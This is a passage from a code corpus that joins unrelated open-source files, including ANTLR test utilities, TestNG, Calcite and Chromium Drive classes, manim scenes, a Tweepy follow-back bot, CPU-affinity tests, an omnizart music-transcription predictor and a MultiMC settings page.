EventType.RS_ZK_REGION_SPLIT, znodeVersion, payload); } }
14,772
11,811
<reponame>maximmenshikov/antlr4<filename>runtime-testsuite/test/org/antlr/v4/test/runtime/RuntimeTestUtils.java package org.antlr.v4.test.runtime; import org.antlr.v4.runtime.*; import org.antlr.v4.runtime.atn.ATN; import org.antlr.v4.runtime.atn.LexerATNSimulator; import org.antlr.v4.runtime.dfa.DFA; import org.antlr.v4.runtime.misc.IntegerList; import org.antlr.v4.tool.LexerGrammar; import java.io.*; import java.util.*; public abstract class RuntimeTestUtils { /** Sort a list */ public static <T extends Comparable<? super T>> List<T> sort(List<T> data) { List<T> dup = new ArrayList<T>(data); dup.addAll(data); Collections.sort(dup); return dup; } /** Return map sorted by key */ public static <K extends Comparable<? super K>,V> LinkedHashMap<K,V> sort(Map<K,V> data) { LinkedHashMap<K,V> dup = new LinkedHashMap<K, V>(); List<K> keys = new ArrayList<K>(data.keySet()); Collections.sort(keys); for (K k : keys) { dup.put(k, data.get(k)); } return dup; } public static List<String> getTokenTypes(LexerGrammar lg, ATN atn, CharStream input) { LexerATNSimulator interp = new LexerATNSimulator(atn, new DFA[]{new DFA(atn.modeToStartState.get(Lexer.DEFAULT_MODE))}, null); List<String> tokenTypes = new ArrayList<String>(); int ttype; boolean hitEOF = false; do { if ( hitEOF ) { tokenTypes.add("EOF"); break; } int t = input.LA(1); ttype = interp.match(input, Lexer.DEFAULT_MODE); if ( ttype==Token.EOF ) { tokenTypes.add("EOF"); } else { tokenTypes.add(lg.typeToTokenList.get(ttype)); } if ( t== IntStream.EOF ) { hitEOF = true; } } while ( ttype!=Token.EOF ); return tokenTypes; } public static IntegerList getTokenTypesViaATN(String input, LexerATNSimulator lexerATN) { ANTLRInputStream in = new ANTLRInputStream(input); IntegerList tokenTypes = new IntegerList(); int ttype; do { ttype = lexerATN.match(in, Lexer.DEFAULT_MODE); tokenTypes.add(ttype); } while ( ttype!= Token.EOF ); return tokenTypes; } public static void copyFile(File source, File dest) throws IOException { InputStream is = new FileInputStream(source); OutputStream os = new FileOutputStream(dest); byte[] buf = new byte[4 << 10]; int l; while ((l = is.read(buf)) > -1) { os.write(buf, 0, l); } is.close(); os.close(); } public static void mkdir(String dir) { File f = new File(dir); f.mkdirs(); } }
1,052
6,969
<filename>3]. Competitive Programming/08]. LeetCode/1]. Problems/Python/0029)_ii_Divide_Two_Integers.py class Solution: def divide(self, dividend, divisor): ans = 0 pos = [abs(divisor)] cnts = [1] n = 0 while pos and n <= abs(dividend): if n + pos[-1] + pos[-1] <= abs(dividend): pos.append(pos[-1] + pos[-1]) cnts.append(cnts[-1] + cnts[-1]) ans += cnts[-1] n += pos[-1] elif n + pos[-1] <= abs(dividend): ans += cnts[-1] n += pos[-1] else: while pos: if n + pos[-1] <= abs(dividend): ans += cnts[-1] n += pos[-1] else: pos.pop() cnts.pop() if dividend > 0 and divisor < 0 or dividend < 0 and divisor > 0: ans = -ans if ans < -(2**31) or ans > 2**31 - 1: return 2**31 - 1 return ans
664
5,364
<gh_stars>1000+ { "name": "defuse/php-encryption", "remark": "Symmetric-key encryption library for PHP applications. (**Recommended** over rolling your own!)", "url": "https://github.com/defuse/php-encryption" }
80
1,540
<gh_stars>1000+ package org.testng.internal.invokers; import java.util.Collection; import java.util.Map; import org.testng.ISuite; import org.testng.TestNGException; import org.testng.collections.Maps; import org.testng.xml.XmlSuite; public class SuiteRunnerMap { private final Map<String, ISuite> m_map = Maps.newHashMap(); public void put(XmlSuite xmlSuite, ISuite suite) { final String name = xmlSuite.getName(); if (m_map.containsKey(name)) { throw new TestNGException("SuiteRunnerMap already have runner for suite " + name); } m_map.put(name, suite); } public ISuite get(XmlSuite xmlSuite) { return m_map.get(xmlSuite.getName()); } public Collection<ISuite> values() { return m_map.values(); } }
280
3,182
package de.plushnikov.intellij.plugin.extension.postfix; import com.intellij.psi.PsiClassType; import com.intellij.psi.PsiType; import com.intellij.refactoring.introduceVariable.IntroduceVariableSettings; public class IntroduceVariableSettingsDelegate implements IntroduceVariableSettings { private final IntroduceVariableSettings variableSettings; private final PsiClassType psiClassType; public IntroduceVariableSettingsDelegate(IntroduceVariableSettings variableSettings, PsiClassType psiClassType) { this.variableSettings = variableSettings; this.psiClassType = psiClassType; } @Override public String getEnteredName() { return variableSettings.getEnteredName(); } @Override public boolean isReplaceAllOccurrences() { return variableSettings.isReplaceAllOccurrences(); } @Override public boolean isDeclareFinal() { return variableSettings.isDeclareFinal(); } @Override public boolean isReplaceLValues() { return variableSettings.isReplaceLValues(); } @Override public PsiType getSelectedType() { return psiClassType; } @Override public boolean isOK() { return variableSettings.isOK(); } }
352
1,979
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to you under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.qihoo.qsql.org.apache.calcite.linq4j; import java.util.Collection; import java.util.Map; import java.util.Objects; /** * Implementation of {@link Grouping}. * * @param <K> Key type * @param <V> Value type */ class GroupingImpl<K, V> extends AbstractEnumerable<V> implements Grouping<K, V>, Map.Entry<K, Enumerable<V>> { private final K key; private final Collection<V> values; GroupingImpl(K key, Collection<V> values) { this.key = Objects.requireNonNull(key); this.values = Objects.requireNonNull(values); } @Override public String toString() { return key + ": " + values; } /** {@inheritDoc} * * <p>Computes hash code consistent with * {@link java.util.Map.Entry#hashCode()}. */ @Override public int hashCode() { return key.hashCode() ^ values.hashCode(); } @Override public boolean equals(Object obj) { return obj instanceof GroupingImpl && key.equals(((GroupingImpl) obj).key) && values.equals(((GroupingImpl) obj).values); } // implement Map.Entry public Enumerable<V> getValue() { return Linq4j.asEnumerable(values); } // implement Map.Entry public Enumerable<V> setValue(Enumerable<V> value) { // immutable throw new UnsupportedOperationException(); } // implement Map.Entry // implement Grouping public K getKey() { return key; } public Enumerator<V> enumerator() { return Linq4j.enumerator(values); } } // End GroupingImpl.java
720
693
from manim_imports_ext import * class TestScene(AlgoScene): def construct(self): avatar = AlgoAvatar(self) avatar.center().scale(0.5) self.add(avatar) self.wait(2) class TestTexScene(AlgoScene): def construct(self): self.show_diff() self.wait(2) def show_diff(self): kw = { "tex_to_color_map": { "x_0": BLUE_D, "y_0": BLUE_B, "{t}": GREY_B, "O(2)": BLUE_D, "前缀和": BLUE_D, "单点": BLUE_D, } } s = VGroup( TexText("1 前缀和:数组不变,区间求和$O(1)$", color=BLACK, **kw), Tex("\\text {1 前缀和:数组不变,区间求和} O(2)", color=BLACK, **kw), TexText("2 树状数组:用于区间求和,单点修改 $O(logn)$", color=BLACK, **kw), TexText("3 线段树:用于区间求和,区间最大值,区间修改,单点修改 $O(logn)$", color=BLACK, **kw), Tex("x({t}) = \\cos(t) x_0 - \\sin(t) y_0", color=BLACK, **kw), ) s.arrange(direction=DOWN, aligned_edge=LEFT, buff=0.1) s.scale(0.5).center() self.add(s)
796
765
/***************************************************************************** * McPAT * SOFTWARE LICENSE AGREEMENT * Copyright (c) 2010-2013 Advanced Micro Devices, Inc. * All Rights Reserved * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer; * redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution; * neither the name of the copyright holders nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * Author: <NAME> * ***************************************************************************/ #include "cachecontroller.h" CacheController::CacheController(XMLNode* _xml_data, InputParameter* _interface_ip) : McPATComponent(_xml_data, _interface_ip) { name = "Cache Controller"; clockRate = target_core_clockrate; McPATComponent::recursiveInstantiate(); }
662
496
#!/usr/bin/env python3 import tweepy import logging from config import create_api import time logging.basicConfig(level=logging.INFO) logger = logging.getLogger() ''' A lot of Twitter API endpoints use pagination to return their results. Tweepy cursors take away part of the complexity of working with paginated results. The Cursor object is iterable and takes care of fetching the various result pages transparently. ''' def follow_followers(api): logger.info("Retrieving and following followers") for follower in tweepy.Cursor(api.followers).items(): if not follower.following: logger.info(f"Following {follower.name}") follower.follow() """ The Bot gets list of followers every minutes (adjustable within time.sleep param) and iterate through it to follow user who are not already followed. """ def main(): api = create_api() while True: follow_followers(api) logger.info("Waiting...") time.sleep(60) if __name__ == "__main__": main()
342
2,151
// Copyright 2017 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef IOS_CHROME_BROWSER_UI_ACTIVITY_SERVICES_REQUIREMENTS_ACTIVITY_SERVICE_PASSWORD_H_ #define IOS_CHROME_BROWSER_UI_ACTIVITY_SERVICES_REQUIREMENTS_ACTIVITY_SERVICE_PASSWORD_H_ @protocol PasswordFormFiller; // ActivityServicePassword contains methods related to password autofill. @protocol ActivityServicePassword // Returns the PasswordFormFiller for the current active WebState. - (id<PasswordFormFiller>)currentPasswordFormFiller; @end #endif // IOS_CHROME_BROWSER_UI_ACTIVITY_SERVICES_REQUIREMENTS_ACTIVITY_SERVICE_PASSWORD_H_
235
1,234
package org.benf.cfr.reader.state; import org.benf.cfr.reader.bytecode.analysis.types.JavaTypeInstance; import org.benf.cfr.reader.entities.innerclass.InnerClassAttributeInfo; import org.benf.cfr.reader.util.functors.UnaryFunction; import java.util.List; public interface ObfuscationTypeMap { boolean providesInnerClassInfo(); JavaTypeInstance get(JavaTypeInstance type); UnaryFunction<JavaTypeInstance, JavaTypeInstance> getter(); List<InnerClassAttributeInfo> getInnerClassInfo(JavaTypeInstance classType); }
172
1,968
////////////////////////////////////////////////////////////////////////////// // // This file is part of the Corona game engine. // For overview and more information on licensing please refer to README.md // Home page: https://github.com/coronalabs/corona // Contact: <EMAIL> // ////////////////////////////////////////////////////////////////////////////// package com.ansca.corona; import com.naef.jnlua.LuaState; import com.naef.jnlua.LuaType; // ---------------------------------------------------------------------------- /** * <font face="Courier New" color="black">CoronaLuaEvent.java</font> contains generic property keys used in Corona * <a href="http://docs.coronalabs.com/daily/api/type/Event.html">events</a> dispatched to Lua. */ public class CoronaLuaEvent { /** * Generic name key. * <p> * &emsp; Constant Value: "name" */ public static final String NAME_KEY = "name"; /** * Generic error key. * <p> * &emsp; Constant Value: "isError" */ public static final String ISERROR_KEY = "isError"; /** * Generic provider key. * <p> * &emsp; Constant Value: "provider" */ public static final String PROVIDER_KEY = "provider"; /** * Generic verification key. * <p> * &emsp; Constant Value: "isVerified" */ public static final String ISVERIFIED_KEY = "isVerified"; /** * Generic response key. * <p> * &emsp; Constant Value: "response" */ public static final String RESPONSE_KEY = "response"; /** * Generic error type key. * <p> * &emsp; Constant Value: "errorType" */ public static final String ERRORTYPE_KEY = "errorType"; /** * Generic configuration key. * <p> * &emsp; Constant Value: "configuration" */ public static final String CONFIGURATION_ERROR = "configuration"; /** * Generic network key. * <p> * &emsp; Constant Value: "network" */ public static final String NETWORK_ERROR = "network"; /** * Generic ads request name key. * <p> * &emsp; Constant Value: "adsRequest" */ public static final String ADSREQUEST_TYPE = "adsRequest"; /** * Generic license type key. * <p> * &emsp; Constant Value: "licensing" */ public static final String LICENSE_REQUEST_TYPE = "licensing"; } // ----------------------------------------------------------------------------
688
2,151
// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "components/drive/chromeos/file_system/search_operation.h" #include <stddef.h> #include "base/callback_helpers.h" #include "components/drive/chromeos/loader_controller.h" #include "components/drive/file_system/operation_test_base.h" #include "components/drive/service/fake_drive_service.h" #include "content/public/test/test_utils.h" #include "google_apis/drive/drive_api_parser.h" #include "google_apis/drive/test_util.h" #include "testing/gtest/include/gtest/gtest.h" namespace drive { namespace file_system { typedef OperationTestBase SearchOperationTest; TEST_F(SearchOperationTest, ContentSearch) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); std::set<std::string> expected_results; expected_results.insert( "drive/root/Directory 1/Sub Directory Folder/Sub Sub Directory Folder"); expected_results.insert("drive/root/Directory 1/Sub Directory Folder"); expected_results.insert("drive/root/Directory 1/SubDirectory File 1.txt"); expected_results.insert("drive/root/Directory 1"); expected_results.insert("drive/root/Directory 2 excludeDir-test"); FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("Directory", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); EXPECT_EQ(expected_results.size(), results->size()); for (size_t i = 0; i < results->size(); i++) { EXPECT_TRUE(expected_results.count(results->at(i).path.AsUTF8Unsafe())) << results->at(i).path.AsUTF8Unsafe(); } } TEST_F(SearchOperationTest, ContentSearchWithNewEntry) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); // Create a new directory in the drive service. google_apis::DriveApiErrorCode status = google_apis::DRIVE_OTHER_ERROR; std::unique_ptr<google_apis::FileResource> server_entry; fake_service()->AddNewDirectory( fake_service()->GetRootResourceId(), "New Directory 1!", AddNewDirectoryOptions(), google_apis::test_util::CreateCopyResultCallback(&status, &server_entry)); content::RunAllTasksUntilIdle(); ASSERT_EQ(google_apis::HTTP_CREATED, status); // As the result of the first Search(), only entries in the current file // system snapshot are expected to be returned in the "right" path. New // entries like "New Directory 1!" is temporarily added to "drive/other". std::set<std::string> expected_results; expected_results.insert("drive/root/Directory 1"); expected_results.insert("drive/other/New Directory 1!"); FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("\"Directory 1\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); ASSERT_EQ(expected_results.size(), results->size()); for (size_t i = 0; i < results->size(); i++) { EXPECT_TRUE(expected_results.count(results->at(i).path.AsUTF8Unsafe())) << results->at(i).path.AsUTF8Unsafe(); } // Load the change from FakeDriveService. ASSERT_EQ(FILE_ERROR_OK, CheckForUpdates()); // Now the new entry must be reported to be in the right directory. expected_results.clear(); expected_results.insert("drive/root/Directory 1"); expected_results.insert("drive/root/New Directory 1!"); error = FILE_ERROR_FAILED; operation.Search("\"Directory 1\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); ASSERT_EQ(expected_results.size(), results->size()); for (size_t i = 0; i < results->size(); i++) { EXPECT_TRUE(expected_results.count(results->at(i).path.AsUTF8Unsafe())) << results->at(i).path.AsUTF8Unsafe(); } } TEST_F(SearchOperationTest, ContentSearchEmptyResult) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("\"no-match query\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); EXPECT_EQ(0U, results->size()); } TEST_F(SearchOperationTest, Lock) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); // Lock. std::unique_ptr<base::ScopedClosureRunner> lock = loader_controller()->GetLock(); // Search does not return the result as long as lock is alive. FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("\"Directory 1\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_FAILED, error); EXPECT_FALSE(results); // Unlock, this should resume the pending search. lock.reset(); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); ASSERT_TRUE(results); EXPECT_EQ(1u, results->size()); } } // namespace file_system } // namespace drive
2,208
1,390
/* * Copyright 2016-2020 chronicle.software * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package net.openhft.affinity; import net.openhft.affinity.impl.Utilities; import net.openhft.affinity.impl.VanillaCpuLayout; import net.openhft.affinity.testimpl.TestFileLockBasedLockChecker; import org.junit.Test; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import static net.openhft.affinity.AffinityLock.PROCESSORS; import static org.hamcrest.CoreMatchers.is; import static org.junit.Assert.*; import static org.junit.Assume.assumeTrue; /** * @author peter.lawrey */ public class AffinityLockTest extends BaseAffinityTest { private static final Logger logger = LoggerFactory.getLogger(AffinityLockTest.class); private final TestFileLockBasedLockChecker lockChecker = new TestFileLockBasedLockChecker(); @Test public void dumpLocksI7() throws IOException { LockInventory lockInventory = new LockInventory(VanillaCpuLayout.fromCpuInfo("i7.cpuinfo")); AffinityLock[] locks = { new AffinityLock(0, true, false, lockInventory), new AffinityLock(1, false, false, lockInventory), new AffinityLock(2, false, true, lockInventory), new AffinityLock(3, false, true, lockInventory), new AffinityLock(4, true, false, lockInventory), new AffinityLock(5, false, false, lockInventory), new AffinityLock(6, false, true, lockInventory), new AffinityLock(7, false, true, lockInventory), }; locks[2].assignedThread = new Thread(new InterrupedThread(), "logger"); locks[2].assignedThread.start(); locks[3].assignedThread = new Thread(new InterrupedThread(), "engine"); locks[3].assignedThread.start(); locks[6].assignedThread = new Thread(new InterrupedThread(), "main"); locks[7].assignedThread = new Thread(new InterrupedThread(), "tcp"); locks[7].assignedThread.start(); final String actual = LockInventory.dumpLocks(locks); assertEquals("0: General use CPU\n" + "1: CPU not available\n" + "2: Thread[logger,5,main] alive=true\n" + "3: Thread[engine,5,main] alive=true\n" + "4: General use CPU\n" + "5: CPU not available\n" + "6: Thread[main,5,main] alive=false\n" + "7: Thread[tcp,5,main] alive=true\n", actual); System.out.println(actual); locks[2].assignedThread.interrupt(); locks[3].assignedThread.interrupt(); locks[6].assignedThread.interrupt(); locks[7].assignedThread.interrupt(); } @Test public void dumpLocksI3() throws IOException { LockInventory lockInventory = new LockInventory(VanillaCpuLayout.fromCpuInfo("i3.cpuinfo")); AffinityLock[] locks = { new AffinityLock(0, true, false, lockInventory), new AffinityLock(1, false, true, lockInventory), new AffinityLock(2, true, false, lockInventory), new AffinityLock(3, false, true, lockInventory), }; locks[1].assignedThread = new Thread(new InterrupedThread(), "engine"); locks[1].assignedThread.start(); locks[3].assignedThread = new Thread(new InterrupedThread(), "main"); final String actual = LockInventory.dumpLocks(locks); assertEquals("0: General use CPU\n" + "1: Thread[engine,5,main] alive=true\n" + "2: General use CPU\n" + "3: Thread[main,5,main] alive=false\n", actual); System.out.println(actual); locks[1].assignedThread.interrupt(); } @Test public void dumpLocksCoreDuo() throws IOException { LockInventory lockInventory = new LockInventory(VanillaCpuLayout.fromCpuInfo("core.duo.cpuinfo")); AffinityLock[] locks = { new AffinityLock(0, true, false, lockInventory), new AffinityLock(1, false, true, lockInventory), }; locks[1].assignedThread = new Thread(new InterrupedThread(), "engine"); locks[1].assignedThread.start(); final String actual = LockInventory.dumpLocks(locks); assertEquals("0: General use CPU\n" + "1: Thread[engine,5,main] alive=true\n", actual); System.out.println(actual); locks[1].assignedThread.interrupt(); } @Test public void assignReleaseThread() throws IOException { if (AffinityLock.RESERVED_AFFINITY.isEmpty()) { System.out.println("Cannot run affinity test as no threads gave been reserved."); System.out.println("Use isolcpus= in grub.conf or use -D" + AffinityLock.AFFINITY_RESERVED + "={hex mask}"); return; } else if (!new File("/proc/cpuinfo").exists()) { System.out.println("Cannot run affinity test as this system doesn't have a /proc/cpuinfo file"); return; } AffinityLock.cpuLayout(VanillaCpuLayout.fromCpuInfo()); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); AffinityLock al = AffinityLock.acquireLock(); assertEquals(1, Affinity.getAffinity().cardinality()); al.release(); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); AffinityLock al2 = AffinityLock.acquireCore(); assertEquals(1, Affinity.getAffinity().cardinality()); al2.release(); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); } @Test public void resetAffinity() { assumeTrue(System.getProperty("os.name").contains("nux")); assertTrue(Affinity.getAffinity().cardinality() > 1); try (AffinityLock lock = AffinityLock.acquireLock()) { assertEquals(1, Affinity.getAffinity().cardinality()); assertTrue(lock.resetAffinity()); lock.resetAffinity(false); } assertEquals(1, Affinity.getAffinity().cardinality()); try (AffinityLock lock = AffinityLock.acquireLock()) { } assertTrue(Affinity.getAffinity().cardinality() > 1); } @Test public void testIssue21() throws IOException { if (!new File("/proc/cpuinfo").exists()) { System.out.println("Cannot run affinity test as this system doesn't have a /proc/cpuinfo file"); return; } AffinityLock.cpuLayout(VanillaCpuLayout.fromCpuInfo()); AffinityLock al = AffinityLock.acquireLock(); AffinityLock alForAnotherThread = al.acquireLock(AffinityStrategies.ANY); if (Runtime.getRuntime().availableProcessors() > 2) { AffinityLock alForAnotherThread2 = al.acquireLock(AffinityStrategies.ANY); assertNotSame(alForAnotherThread, alForAnotherThread2); if (alForAnotherThread.cpuId() != -1) assertNotSame(alForAnotherThread.cpuId(), alForAnotherThread2.cpuId()); alForAnotherThread2.release(); } else { assertNotSame(alForAnotherThread, al); if (alForAnotherThread.cpuId() != -1) assertNotSame(alForAnotherThread.cpuId(), al.cpuId()); } alForAnotherThread.release(); al.release(); } @Test public void testIssue19() { System.out.println("AffinityLock.PROCESSORS=" + PROCESSORS); AffinityLock al = AffinityLock.acquireLock(); List<AffinityLock> locks = new ArrayList<>(); locks.add(al); for (int i = 0; i < 256; i++) locks.add(al = al.acquireLock(AffinityStrategies.DIFFERENT_SOCKET, AffinityStrategies.DIFFERENT_CORE, AffinityStrategies.SAME_SOCKET, AffinityStrategies.ANY)); for (AffinityLock lock : locks) { lock.release(); } } @Test public void testGettid() { System.out.println("cpu= " + Affinity.getCpu()); } @Test public void testAffinity() throws InterruptedException { // System.out.println("Started"); logger.info("Started"); displayStatus(); try (AffinityLock al = AffinityLock.acquireLock()) { System.out.println("Main locked"); displayStatus(); Thread t = new Thread(new Runnable() { @Override public void run() { AffinityLock al2 = al.acquireLock(AffinityStrategies.SAME_SOCKET, AffinityStrategies.ANY); System.out.println("Thread-0 locked"); displayStatus(); al2.release(); } }); t.start(); t.join(); System.out.println("Thread-0 unlocked"); displayStatus(); } System.out.println("All unlocked"); displayStatus(); } @Test public void shouldReturnLockForSpecifiedCpu() { assumeTrue(Runtime.getRuntime().availableProcessors() > 3); try (final AffinityLock affinityLock = AffinityLock.acquireLock(3)) { assertThat(affinityLock.cpuId(), is(3)); } assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); } @Test public void lockFilesShouldBeRemovedOnRelease() { if (!Utilities.ISLINUX) { return; } final AffinityLock lock = AffinityLock.acquireLock(); assertTrue(Files.exists(Paths.get(lockChecker.doToFile(lock.cpuId()).getAbsolutePath()))); lock.release(); assertFalse(Files.exists(Paths.get(lockChecker.doToFile(lock.cpuId()).getAbsolutePath()))); } private void displayStatus() { System.out.println(Thread.currentThread() + " on " + Affinity.getCpu() + "\n" + AffinityLock.dumpLocks()); } @Test public void testAffinityLockDescriptions() { if (!Utilities.ISLINUX) { return; } try (AffinityLock lock = AffinityLock.acquireLock("last")) { assertEquals(PROCESSORS - 1, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("last")) { assertEquals(PROCESSORS - 1, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("last-1")) { assertEquals(PROCESSORS - 2, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("1")) { assertEquals(1, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("any")) { assertTrue(lock.bound); } try (AffinityLock lock = AffinityLock.acquireLock("none")) { assertFalse(lock.bound); } try (AffinityLock lock = AffinityLock.acquireLock((String) null)) { assertFalse(lock.bound); } try (AffinityLock lock = AffinityLock.acquireLock("0")) { assertFalse(lock.bound); } } }
5,091
506
<reponame>Ashindustry007/competitive-programming // https://open.kattis.com/problems/stararrangements #include <iostream> using namespace std; int main() { int s; cin >> s; cout << s << ":\n"; for (int i = 2; i < s; i++) { if (s % (2 * i - 1) == 0 || s % (2 * i - 1) == i) cout << i << "," << i - 1 << endl; if (s % i == 0) cout << i << "," << i << endl; } }
163
1,145
""" To push this predictor to replicate.com, first run download_checkpoints() and save files to omnizart/checkpoints. Then run cog push. Further documentation can be found at https://replicate.com/docs """ import os import tempfile import subprocess import shutil from pathlib import Path import cog import scipy.io.wavfile as wave from omnizart.remote import download_large_file_from_google_drive from omnizart.beat import app as bapp from omnizart.chord import app as capp from omnizart.drum import app as dapp from omnizart.music import app as mapp from omnizart.vocal import app as vapp from omnizart.vocal_contour import app as vcapp class Predictor(cog.Predictor): def setup(self): self.SF2_FILE = "general_soundfont.sf2" if not os.path.exists(self.SF2_FILE): print("Downloading soundfont...") download_large_file_from_google_drive( "16RM-dWKcNtjpBoo7DFSONpplPEg5ruvO", file_length=31277462, save_name=self.SF2_FILE ) self.app = {"music": mapp, "chord": capp, "drum": dapp, "vocal": vapp, "vocal-contour": vcapp, "beat": bapp} self.model_path = {"piano": "Piano", "piano-v2": "PianoV2", "assemble": "Stream", "pop-song": "Pop", "": None} @cog.input( "audio", type=Path, help="Path to the input music. Supports mp3 and wav format.", ) @cog.input( "mode", type=str, default="music-piano-v2", options=["music-piano", "music-piano-v2", "music-assemble", "chord", "drum", "vocal", "vocal-contour", "beat"], help="Transcription mode", ) def predict(self, audio, mode): assert str(audio).endswith(".mp3") or str(audio).endswith(".wav"), "Please upload mp3 or wav file." temp_folder = "cog_temp" os.makedirs(temp_folder, exist_ok=True) try: audio_name = str(os.path.splitext(os.path.basename(audio))[0]) if str(audio).endswith(".wav"): wav_file_path = str(audio) else: wav_file_path = f"{temp_folder}/{audio_name}.wav" subprocess.run(["ffmpeg", "-y", "-i", str(audio), wav_file_path]) model = "" if mode.startswith("music"): mode_list = mode.split("-") mode = mode_list[0] model = "-".join(mode_list[1:]) app = self.app[mode] model_path = self.model_path[model] midi = app.transcribe(wav_file_path, model_path=model_path) if mode == "vocal-contour": out_name = f"{audio_name}_trans.wav" else: print("Synthesizing MIDI...") out_name = f"{temp_folder}/{audio_name}_synth.wav" raw_wav = midi.fluidsynth(fs=44100, sf2_path=self.SF2_FILE) wave.write(out_name, 44100, raw_wav) out_path = Path(tempfile.mkdtemp()) / "out.mp3" # out_path is automatically cleaned up by cog subprocess.run(["ffmpeg", "-y", "-i", out_name, str(out_path)]) finally: shutil.rmtree(temp_folder) if os.path.exists(f"{audio_name}.mid"): os.remove(f"{audio_name}.mid") if os.path.exists(f"{audio_name}_trans.wav"): os.remove(f"{audio_name}_trans.wav") return out_path
1,616
2,777
/* Copyright 2013-2021 MultiMC Contributors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "PasteEEPage.h" #include "ui_PasteEEPage.h" #include <QMessageBox> #include <QFileDialog> #include <QStandardPaths> #include <QTabBar> #include "settings/SettingsObject.h" #include "tools/BaseProfiler.h" #include "Application.h" PasteEEPage::PasteEEPage(QWidget *parent) : QWidget(parent), ui(new Ui::PasteEEPage) { ui->setupUi(this); ui->tabWidget->tabBar()->hide();\ connect(ui->customAPIkeyEdit, &QLineEdit::textEdited, this, &PasteEEPage::textEdited); loadSettings(); } PasteEEPage::~PasteEEPage() { delete ui; } void PasteEEPage::loadSettings() { auto s = APPLICATION->settings(); 